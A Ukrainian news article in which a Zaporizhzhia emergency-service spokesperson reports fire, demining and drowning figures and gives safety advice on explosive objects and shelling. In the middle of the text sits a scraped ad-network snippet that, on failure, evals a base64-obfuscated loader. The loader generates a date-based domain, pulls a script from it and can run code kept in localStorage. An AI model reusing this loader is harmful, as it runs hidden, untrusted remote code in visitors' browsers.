Пожежи, обстріли та небезпечні водойми на Запоріжжі: у ДСНС попередили про актуальні загрози для запоріжців

Як поводитись правильно? Все що стосується мін, обстрілів та будь яких небезпечних ситуаціях.

Начальниця відділу зв’язків ЗМІ та роботи з громадністю ГУ ДСНС України у Запорізькій області Юлія Баришева висловила свою думку стосовно цих питань.

«Спочатку поточного року запорізькі рятувальники понад 3400 разів виїзджали за сигналом тривоги, з них 1291 пожежа, яка вчасно ліквідована з мінімізуванням наслідків пожеж. Спочатку повномасштабного вторгнення наші рятувальники 1200 разів працювали під обстрілами, ліквідовуючи наслідки ворожих обстрілів. На сьогоднішній день, ми констатуємо, те що 1235 пожеж виникли вже в єкосистемах, площею близько 100 гектар, які були пошкоджені пожежами. На полях виникло 10 пожеж, з загально пошкодженою площею близько 85,5 гектарів родючої  землі, яка була вроджена хлібом та іншими зерновими культурами»

Що стосується вибухонебезпечних предметів?

«Окупована територія настільки щільно замінована, що знадобиться не один десяток років для того, аби після деокупації її розмінувати. На сьогоднішній день у нас є 11 піротехнічних груп, але 6 з них працюють на виїзді, тобто допомагають розміновувати території Харківської і Херсонської областей,  як тільки деокупація відбудеться у Запорізькій області і виникне можливість першими зайти до окупованого Мелітополя, Бердянська, Токмаку буде проводитись дуже щільне розмінування вибухонебезпечних пристроїв. Згідно ‘плану взаємодії’ будуть залучені піротехніки з інших областей України, аби якомога швидше дати можливість розмінувати деокуповані території. 

На сьогоднішний день, якщо рахувати спочатку війни це майже 3,5 тисячі вибухонебезпечних предметів, які наші піротехніки вилучили і знешкодили. З початку поточного року вже 612 вибухонебезпечних предметів, з них багато розташовані на узбережжі річки Дніпро та Каховського водосховища, а точніше його залишків, яке знаходиться на території Запорізької області. Зараз багато вибухонебезпечних предметів, які знаходились на дні — показались на поверхні і лежать прямо на березі.

Нещодавно наші піротехніки виїзджали в один з населених пунктів Запорізького району і знешкоджували авіаційну бомбу FA-50 часів Першої світової війни».

Чи є наразі водойми відкриті для відвідування? Чи правильно бути поблизу популярних місць відпочинку?

У Запорізькій області з початку поточного року потонуло 15 людей, з 2 дітей, підлітків. Юлія Баришева звертає увагу на те, що в Запорізькій області на підконтрольних територіях України немає водойм, які дозволені для купання. Адже під час обстрілів, або тривог на пляжі немає місць для укриття. 

У травні комісія ТПНС прийняла заборону на відвідування водойм, тому що в цьому році у зв’язку з військовими діями пляж та дно не проходили перевірку.

У червні місяці була посилена дана заборона. З моменту прориву Каховської ГЄС українські піротехніки виїзджали вже 45 разів та знешкодили 72 вибухонебезпечних предметів.»

У водах Дніпра стрімко почали розвиватись мікроорганізми. Згідно з даними МОЗ, вода в Запоріжжі не відповідає нормам та купання є небезпечним для мешканців. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Який алгоритм дій при виявленні небезпечного предмету на вулиці?

Небезпечні предмети діляться на 2 категорії:

схожі на вибухонебезпечні предметиприховані пастки (у вигляді іграшки чи продуктів харчування)

В жодному випадку не чіпайте підозрілий предмет. Повідомте у відповідні служби. Дзвінок в поліцію, або на державну службу 101. Перш за все покинути небезпечну територію, тим шляхом яким прийшли, відійти на безпечну відстань, допоки не ідентифікують що саме це за предмет. Радіус розльоту уламків може бути від 50 метрів до 500 метрів. За можливості сфотографуйте підозрілу річ, за для розуміння місцезнаходження. Не треба чіпати, пересувати, нагрівати, кидати каміння».

Що може зменшити пожежі? Як правильно реагувати та на що звертати свою увагу?

Перш за все, треба звернути увагу на те, що заборонено випалювати суху рослинність, навіть біля присадибних ділянок, своїх домівок та дачних кооперативів. За дані діяння несеться адміністративна відповідальність, в деяких випадках навіть виписується штраф.

На сьогоднішній день Степногірськ, Горіхов, Гуляйполе, Комишуваха це саме ті гарячі точки на мапі нашої області, де є гуманітарна катастрофа, людям не вистачає води, тому ми надаємо як технічну так і питну воду мешканцям. Спочатку проведення цієї роботи вже понад 7100 тон технічної води було надано громадянам. 92 тони питної води було надано мешканцям. Близько 100 тон продуктів харчування також було надано українцям.

В містах де люди повиїзджали залишилось багато тварин, служби порятунку переймаються і за їх життя, надають допомогу тваринам та рятують їхні життя. Волонтерська благодійна організація ‘YOUANIMAL’ дуже активно приймають участі у рятуванні та надання різної допомоги тваринам. Вже вдруге вони передають другу тонну гуманітарного корму для тварин.

Що робити у разі тривоги та загрозі ракетного обстрілу?

Обстріли небезпечні тим, що може бути пряме влучання, розліт уламків, руйнування конструкцій, слід за цим й ураження завалами. Пам’ятайте правила двох стін, якщо поблизу немає укриття. Опануйте першу лікарську допомогу, наразі це дуже потрібне знання.

Джерело — канал МТМ Запоріжжя. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/pozhezhi-obstrili-ta-nebezpechni-vodojmi-na-zaporizhzhi-u-dsns-poperedili-pro-aktualni-zagrozi-dlya-zaporizhtsiv/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top